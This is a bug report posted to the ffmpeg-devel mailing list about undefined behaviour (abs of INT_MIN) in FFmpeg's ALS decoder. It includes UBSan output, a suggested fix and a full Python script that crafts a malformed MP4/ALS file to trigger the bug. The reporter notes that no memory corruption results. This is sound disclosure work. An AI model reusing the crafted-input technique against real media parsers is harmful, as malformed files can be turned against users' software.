Hi,

I found a UBSan-confirmed undefined behavior in libavcodec/alsdec.c.

FFmpeg version: N-123228-g0ddece40c5
Build: gcc 11 (Ubuntu 11.4.0-1ubuntu1~22.04.3), -fsanitize=address,undefined

Location: alsdec.c:1563

    nbits[i] = 23 - av_log2(abs(ctx->raw_samples[c][i]));

When raw_samples[c][i] == INT_MIN (0x80000000), abs() invokes undefined
behavior -- negation of INT_MIN cannot be represented in signed int.

UBSan output:
    libavcodec/alsdec.c:1563:41: runtime error: negation of -2147483648 cannot be
    represented in type 'int'; cast to an unsigned type to negate this value to itself
        #0 in read_diff_float_data  libavcodec/alsdec.c:1563
        #1 in read_frame_data       libavcodec/alsdec.c:1793
        #2 in decode_frame          libavcodec/alsdec.c:1836
        #3 in decode_simple_internal libavcodec/decode.c:444

Trigger conditions:
  - ALS stream with floating=1 in ALSSpecificConfig
  - acf != FLOAT_1 (takes the av_cmp_sf_ieee754 branch at L1562)
  - Rice-coded sample value that produces raw_samples[c][i] == INT_MIN
    (e.g. shift_lsbs=16, decoded value=32768 -> 32768 << 16 = 0x80000000)

Reproduction (UBSan+ASan build required):
    python3 poc_als.py        # generates /tmp/poc_als
    ffmpeg -i /tmp/poc_als -f null - 2>&1

Note: no memory corruption results. The FFMIN() at L1567 uses an unsigned
comparison (highest_byte is unsigned int), so the indeterminate nbits[i]
value gets clamped before any memory access or nchars accumulation.

Suggested fix:

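    nbits[i] = 23 - av_log2(FFABSU(ctx->raw_samples[c][i]));

FFABSU() handles INT_MIN correctly by casting to unsigned before negation.
(Plain FFABS() negates in the signed type, so it would still be undefined
for INT_MIN, exactly like abs().)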

PoC generator (poc_als.py) and full UBSan log (crash.log) attached.

Thanks,
Jenny Guanni Qu
[email protected]

Attachment: crash.log
Description: Binary data

#!/usr/bin/env python3
"""
PoC for UBSan-confirmed undefined behavior in alsdec.c read_diff_float_data()

Bug: nbits[i] = 23 - av_log2(abs(raw_samples[i])). When raw_samples[i] == INT_MIN
(0x80000000), abs(INT_MIN) invokes undefined behavior -- negation of INT_MIN cannot
be represented in type 'int'. UBSan reports:
    runtime error: negation of -2147483648 cannot be represented in type 'int'

Note: No heap overflow results. The FFMIN() at L1567 uses an unsigned comparison
(highest_byte is unsigned int), so the indeterminate nbits[i] value is clamped
before any memory access or nchars accumulation.

Trigger: ALS stream with floating=1, acf!=FLOAT_1, raw_samples == INT_MIN (achieved
via shift_lsbs=16), highest_byte != 0.
"""

import struct
import sys
import io

def write_be32(val):
    """Return the low 32 bits of *val* as 4 big-endian bytes."""
    upper_half = (val >> 16) & 0xFFFF
    lower_half = val & 0xFFFF
    return struct.pack('>HH', upper_half, lower_half)

def write_be16(val):
    """Return the low 16 bits of *val* as 2 big-endian bytes."""
    high_byte = (val >> 8) & 0xFF
    low_byte = val & 0xFF
    return struct.pack('>BB', high_byte, low_byte)

def write_be24(val):
    """Return the low 24 bits of *val* as 3 big-endian bytes."""
    top_byte = (val >> 16) & 0xFF
    low_word = val & 0xFFFF
    return struct.pack('>BH', top_byte, low_word)

class BitWriter:
    """Collect individual bits in stream order and pack them MSB-first."""

    def __init__(self):
        # One entry (0 or 1) per bit written so far.
        self.bits = []

    def write_bits(self, value, nbits):
        """Append the low *nbits* bits of *value*, most significant bit first."""
        self.bits.extend(
            (value >> shift) & 1 for shift in reversed(range(nbits))
        )

    def write_bit(self, value):
        """Append the least significant bit of *value*."""
        self.bits.append(value & 1)

    def to_bytes(self):
        """Zero-pad the stream to a byte boundary and return it as bytes.

        The padding is appended to the writer itself, so len() is a multiple
        of 8 afterwards and later writes start on a byte boundary.
        """
        missing = -len(self.bits) % 8
        self.bits.extend([0] * missing)

        packed = bytearray()
        for start in range(0, len(self.bits), 8):
            octet = 0
            for bit in self.bits[start:start + 8]:
                octet = (octet << 1) | bit
            packed.append(octet)
        return bytes(packed)

    def __len__(self):
        """Return the number of bits written (including any padding)."""
        return len(self.bits)


def rice_encode(value, k):
    """Return the list of bits that encodes signed *value* with Rice parameter *k*.

    The layout mirrors what the comments in this script attribute to
    decode_rice() in alsdec.c:

    * k >= 1: a unary prefix (1-bits terminated by a 0-bit), one sign bit r,
      then k-1 low-order bits (MSB first).  The decoder rebuilds q from the
      prefix and low bits and returns q when r is 1, ~q when r is 0.
    * k == 0: a single unary code whose length carries both magnitude and
      sign (even length -> non-negative, odd length -> negative).
    """
    non_negative = value >= 0

    if not k >= 1:
        # k == 0: fold the sign into the unary length itself.
        unary_len = value * 2 if non_negative else (-value) * 2 - 1
        return [1] * unary_len + [0]

    sign_bit = 1 if non_negative else 0
    # Negative values are stored as their bitwise complement.
    magnitude = value if non_negative else ~value

    # For k == 1 there are no low bits, so the whole magnitude is unary coded.
    prefix_len = magnitude >> (k - 1) if k > 1 else magnitude
    encoded = [1] * prefix_len + [0, sign_bit]

    if k > 1:
        remainder = magnitude & ((1 << (k - 1)) - 1)
        encoded.extend(
            (remainder >> pos) & 1 for pos in range(k - 2, -1, -1)
        )

    return encoded


def build_als_extradata(sample_rate, num_samples, num_channels, frame_length):
    """Serialize an AudioSpecificConfig that embeds an ALSSpecificConfig.

    The result is meant to be stored as codec extradata.  Fields are emitted
    MSB-first in the order listed below and the final byte is zero-padded.

    Args:
        sample_rate: Written both as the 24-bit escaped sampling frequency
            and as the 32-bit ALS samp_freq.
        num_samples: Written as the 32-bit ALS sample count.
        num_channels: Channel count; stored as num_channels - 1 in 16 bits.
        frame_length: Frame length; stored as frame_length - 1 in 16 bits.

    Returns:
        The packed configuration as bytes.
    """
    # (value, bit width) pairs in bitstream order.
    fields = (
        # ---- AudioSpecificConfig ----
        (31, 5),            # audioObjectType escape code
        (4, 6),             # extended object type: 32 + 4 = 36 (ALS)
        (0xF, 4),           # samplingFrequencyIndex escape
        (sample_rate, 24),  # explicit sampling frequency
        (1, 4),             # channelConfiguration = 1 (mono)
        (0, 5),             # 5 fill bits the parser skips for AOT 36
        # ---- ALSSpecificConfig ----
        (0x414C5300, 32),   # identifier 'ALS\0'
        (sample_rate, 32),  # samp_freq
        (num_samples, 32),  # samples
        (num_channels - 1, 16),  # channels - 1
        (0, 3),             # file_type = 0 (raw)
        (3, 3),             # resolution = 3 (32-bit)
        (1, 1),             # floating = 1
        (0, 1),             # msb_first = 0
        (frame_length - 1, 16),  # frame_length - 1
        (1, 8),             # ra_distance = 1 (every frame is RA)
        (0, 2),             # ra_flag = 0 (no RA unit sizes)
        (0, 1),             # adapt_order = 0
        (0, 2),             # coef_table = 0
        (0, 1),             # long_term_prediction = 0
        (0, 10),            # max_order = 0
        (0, 2),             # block_switching = 0
        (0, 1),             # bgmc = 0
        (0, 1),             # sb_part = 0
        (0, 1),             # joint_stereo = 0
        (0, 1),             # mc_coding = 0
        (0, 1),             # chan_config = 0
        (0, 1),             # chan_sort = 0
        (0, 1),             # crc_enabled = 0
        (0, 1),             # rlslms = 0
        (0, 5),             # reserved
        (0, 1),             # aux_data_enabled = 0
        (0xFFFFFFFF, 32),   # header_size = 0xFFFFFFFF (no header)
        (0xFFFFFFFF, 32),   # trailer_size = 0xFFFFFFFF (no trailer)
    )

    writer = BitWriter()
    for field_value, width in fields:
        writer.write_bits(field_value, width)
    return writer.to_bytes()


def build_als_frame(frame_length):
    """Build one ALS frame whose decoded samples all equal INT_MIN.

    The frame holds a single variable block with opt_order 0, Rice parameter
    s[0] = 15 and shift_lsbs = 16.  Every residual is Rice-coded as 32768,
    so after the left shift each raw sample is 32768 << 16 = 0x80000000,
    which is INT_MIN as an int32.  The float-difference section that follows
    selects highest_byte = 3 so that the decoder evaluates
    23 - av_log2(abs(sample)) on those samples; abs(INT_MIN) is the
    undefined behavior UBSan reports.  Per the accompanying report, the
    FFMIN clamp at alsdec.c L1567 bounds nbits before any memory access.

    Args:
        frame_length: Number of samples (residuals) to emit.

    Returns:
        The frame as bytes, zero-padded to a byte boundary.
    """
    writer = BitWriter()

    # --- Block header (read_block / read_var_block_data) ---
    # With mc_coding=0, joint_stereo=0 and block_switching=0 the frame is a
    # single independent block and no bs_info bits are read.
    block_header = (
        (1, 1),    # block type: 1 = variable block
        (0, 1),    # js_blocks
        (15, 5),   # s[0]: Rice parameter (5 bits because resolution > 1)
        (1, 1),    # shift_lsbs flag
        (15, 4),   # shift_lsbs - 1, i.e. shift by 16
    )
    for field_value, width in block_header:
        writer.write_bits(field_value, width)

    # opt_order is 0 and LTP is off, so no coefficients or initial samples
    # are coded; the residuals follow immediately.
    #
    # 32768 with k=15: prefix = 32768 >> 14 = 2 -> unary "110", sign bit 1,
    # then 14 zero low bits: 3 + 1 + 14 = 18 bits per sample.
    residual_bits = rice_encode(32768, 15)
    for _ in range(frame_length):
        for bit in residual_bits:
            writer.write_bit(bit)

    # The decoder byte-aligns after the block on the non-mc_coding,
    # non-joint_stereo path.
    writer.write_bits(0, -len(writer) % 8)

    # --- Float difference data (read_diff_float_data, floating=1) ---
    # NOTE(review): the report describes use_acf=0 as selecting the
    # "acf != FLOAT_1" branch at alsdec.c:1562; confirm the polarity of the
    # av_cmp_sf_ieee754() test against alsdec.c.
    float_header = (
        (0, 32),   # num_bytes_diff_float (skipped by the decoder)
        (0, 1),    # use_acf = 0
        (3, 2),    # highest_byte = 3 (non-zero, so part B is decoded)
        (0, 1),    # partA_flag = 0 (skip part A)
        (0, 1),    # shift_amp = 0 (reuse last_shift_value, 0 after RA init)
        (1, 1),    # part B: 1 = compressed (MLZ path)
    )
    for field_value, width in float_header:
        writer.write_bits(field_value, width)

    # 256 zero bytes for the MLZ decoder to consume.
    writer.write_bits(0, 256 * 8)

    return writer.to_bytes()


def build_mp4(extradata, frame_data, sample_rate=44100, frame_length=4):
    """Build a minimal MP4 file carrying one ALS audio sample.

    The file consists of ftyp, moov (a single sound track whose sample table
    describes one chunk holding one sample) and mdat containing *frame_data*.

    Compared with a naive byte-literal layout this builder takes care of:

    * MPEG-4 descriptor sizes: every descriptor length covers its full
      payload (including nested descriptors) and uses the expandable
      multi-byte size encoding, so extradata of 128 bytes or more works.
    * tkhd / mvhd are emitted in their version-0 layouts (84 and 100 payload
      bytes) with the unity transformation matrix.
    * The stco chunk offset is computed up front rather than patched by
      searching the output for b'stco', which would hit the wrong bytes if
      *extradata* happened to contain that sequence.

    Args:
        extradata: AudioSpecificConfig bytes, stored as DecoderSpecificInfo.
        frame_data: Payload of the single media sample.
        sample_rate: Movie/media timescale and mp4a sample rate.  Must fit
            in 16 bits because mp4a stores it as 16.16 fixed point.
        frame_length: Sample duration in timescale ticks; should match the
            frame length encoded in *extradata*.

    Returns:
        The complete file as bytes.

    Raises:
        struct.error: If *sample_rate* does not fit in an unsigned 16-bit
            field or a size/duration does not fit in 32 bits.
    """

    def box(box_type, data):
        """Wrap *data* in a box: 32-bit size, 4-byte type, payload."""
        return struct.pack('>I', 8 + len(data)) + box_type + data

    def descriptor(tag, payload):
        """Wrap *payload* in an MPEG-4 descriptor with an expandable size."""
        remaining = len(payload)
        size_bytes = [remaining & 0x7F]
        remaining >>= 7
        while remaining:
            # Higher-order 7-bit groups come first with the MSB set.
            size_bytes.insert(0, 0x80 | (remaining & 0x7F))
            remaining >>= 7
        return bytes([tag]) + bytes(size_bytes) + payload

    # Unity matrix used by both mvhd and tkhd.
    unity_matrix = struct.pack(
        '>9I', 0x00010000, 0, 0, 0, 0x00010000, 0, 0, 0, 0x40000000
    )

    ftyp = box(b'ftyp', b'M4A \x00\x00\x00\x00M4A mp42')

    # --- esds: ES_Descriptor > DecoderConfigDescriptor > DecoderSpecificInfo ---
    dec_specific_info = descriptor(0x05, extradata)
    dec_config_desc = descriptor(0x04, bytes([
        0x40,  # objectTypeIndication = Audio ISO/IEC 14496-3
        0x15,  # streamType = audio (5<<2 | 1)
        0x00, 0x00, 0x00,  # bufferSizeDB
        0x00, 0x01, 0x00, 0x00,  # maxBitrate
        0x00, 0x01, 0x00, 0x00,  # avgBitrate
    ]) + dec_specific_info)
    sl_config_desc = descriptor(0x06, bytes([0x02]))
    es_desc = descriptor(0x03, bytes([
        0x00, 0x01,  # ES_ID
        0x00,  # stream priority
    ]) + dec_config_desc + sl_config_desc)
    esds = box(b'esds', bytes(4) + es_desc)  # bytes(4) = version + flags

    # --- mp4a sample entry ---
    mp4a = box(b'mp4a', bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # reserved
        0x00, 0x01,  # data_reference_index
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # reserved
        0x00, 0x01,  # channel_count = 1
        0x00, 0x10,  # sample_size = 16
        0x00, 0x00,  # compression_id
        0x00, 0x00,  # packet_size
    ]) + struct.pack('>HH', sample_rate, 0) + esds)  # 16.16 fixed point

    # --- sample table pieces that do not depend on the chunk offset ---
    stsd = box(b'stsd', struct.pack('>II', 0, 1) + mp4a)
    stts = box(b'stts', struct.pack('>IIII', 0, 1, 1, frame_length))
    stsc = box(b'stsc', struct.pack('>IIIII', 0, 1, 1, 1, 1))
    stsz = box(b'stsz', struct.pack('>IIII', 0, 0, 1, len(frame_data)))

    smhd = box(b'smhd', bytes(8))
    url_box = box(b'url ', bytes([0x00, 0x00, 0x00, 0x01]))  # self-contained
    dref = box(b'dref', struct.pack('>II', 0, 1) + url_box)
    dinf = box(b'dinf', dref)

    # mdhd: version/flags, creation, modification, timescale, duration,
    # then language + pre_defined packed into the final 32 bits.
    mdhd = box(b'mdhd',
               struct.pack('>IIIIII', 0, 0, 0, sample_rate, frame_length, 0))
    hdlr = box(b'hdlr', bytes(4) + b'\x00\x00\x00\x00soun' + bytes(12) +
               b'SoundHandler\x00')

    # tkhd, version 0, flags = 3.
    tkhd = box(b'tkhd',
               struct.pack('>I', 0x00000003) +
               # creation, modification, track_ID, reserved, duration
               struct.pack('>IIIII', 0, 0, 1, 0, frame_length) +
               bytes(8) +  # reserved
               # layer, alternate_group, volume (8.8), reserved
               struct.pack('>HHHH', 0, 0, 0x0100, 0) +
               unity_matrix +
               struct.pack('>II', 0, 0))  # width, height

    # mvhd, version 0.
    mvhd = box(b'mvhd',
               # version/flags, creation, modification, timescale, duration
               struct.pack('>IIIII', 0, 0, 0, sample_rate, frame_length) +
               struct.pack('>I', 0x00010000) +  # rate = 1.0
               struct.pack('>H', 0x0100) +  # volume = 1.0
               bytes(10) +  # reserved
               unity_matrix +
               bytes(24) +  # pre_defined
               struct.pack('>I', 2))  # next_track_ID

    def build_moov(chunk_offset):
        """Assemble moov with the given absolute offset of the sample data."""
        stco = box(b'stco', struct.pack('>III', 0, 1, chunk_offset))
        stbl = box(b'stbl', stsd + stts + stsc + stsz + stco)
        minf = box(b'minf', smhd + dinf + stbl)
        mdia = box(b'mdia', mdhd + hdlr + minf)
        trak = box(b'trak', tkhd + mdia)
        return box(b'moov', mvhd + trak)

    # The size of moov does not depend on the offset value, so measure it
    # with a placeholder, then rebuild with the real offset.  The sample
    # data starts right after the 8-byte mdat header.
    payload_offset = len(ftyp) + len(build_moov(0)) + 8
    moov = build_moov(payload_offset)

    return ftyp + moov + box(b'mdat', frame_data)


def main():
    """Generate the PoC file at /tmp/poc_als and print a summary of its parts."""
    sample_rate, frame_length, num_channels = 44100, 4, 1
    # The stream contains exactly one frame.
    num_samples = frame_length

    summary = (
        "[*] Building ALS PoC",
        f"    Sample rate: {sample_rate}",
        f"    Frame length: {frame_length}",
        f"    Channels: {num_channels}",
        "    floating=1, max_order=0, adapt_order=0",
        "    Rice param s[0]=15, shift_lsbs=16",
        "    Raw sample value: 32768 << 16 = 0x80000000 (INT_MIN)",
        "    nbits = 23 - av_log2(abs(INT_MIN)) triggers UB at alsdec.c:1563",
        "    abs(INT_MIN): negation of -2147483648 cannot be represented in 'int'",
        "    FFMIN at L1567 clamps nbits before any memory access (no heap overflow)",
    )
    for line in summary:
        print(line)

    extradata = build_als_extradata(
        sample_rate, num_samples, num_channels, frame_length
    )
    print(f"\n[*] Extradata size: {len(extradata)} bytes")
    print(f"    Hex: {extradata.hex()}")

    frame_data = build_als_frame(frame_length)
    print(f"[*] Frame data size: {len(frame_data)} bytes")
    print(f"    Hex: {frame_data.hex()}")

    mp4_data = build_mp4(extradata, frame_data)

    output_path = "/tmp/poc_als"
    with open(output_path, 'wb') as out_file:
        out_file.write(mp4_data)

    print(f"\n[+] PoC written to {output_path} ({len(mp4_data)} bytes)")
    usage = (
        "\n[*] Test with (UBSan+ASan build required):",
        "    python3 poc_als.py",
        f"    ~/ffmpeg/ffmpeg -i {output_path} -f null - 2>&1 | tail -50",
    )
    for line in usage:
        print(line)


# Generate the PoC only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
_______________________________________________
ffmpeg-devel mailing list -- [email protected]
To unsubscribe send an email to [email protected]

Reply via email to